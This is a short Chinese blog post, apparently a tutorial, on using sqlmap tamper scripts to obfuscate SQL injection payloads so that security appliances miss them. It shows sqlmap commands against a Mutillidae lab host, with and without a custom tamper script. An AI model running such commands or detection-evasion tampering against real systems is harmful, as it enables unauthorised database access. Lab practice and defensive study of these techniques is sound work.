0
点赞
收藏
分享

微信扫一扫

SQLMAP-绕过脚本,混淆脚本

IT影子 2022-01-13 阅读 31

sqlmap-tamper 在kali 的储存位置为/usr/share/sqlmap/tamper

 

当我们对于一些特殊的字符做替换的时候我们可以通过tamper中的脚本进行自动化的更改我们发送的payload

                                        这里举个注入的例子

我们正常的攻击求如下:

sqlmap 上普通注入命令如下:
sqlmap -u "http://192.168.1.134/mutillidae/index.php?page=user-info.php&username=asdmin*&password=asdmin*&user-info-php-submit-button=View+Account+Details" --dbs

sqlmap 上普通注入下安全设备检测的结果:

可见攻击的语句没有做过任何的混淆,那么我们如何通过自定义的脚本将里面的一些敏感字替换掉呢?下面的tamper就是为了解决这种混淆的问题产生的。

这里看一个简单地案例:这个是写的一个test.py

 

sqlmap 上加了tamper注入命令如下:

sqlmap -u "http://192.168.1.134/mutillidae/index.php?page=user-info.php&username=asdmin*&password=asdmin*&user-info-php-submit-button=View+Account+Details" --tamper=test.py --dbs

sqlmap 上加了tamper注入下安全设备检测的结果: 

 这样就成功的替换掉了相应的敏感字符。

举报

相关推荐

sqlmap绕过CSRF检测进行注入

0 条评论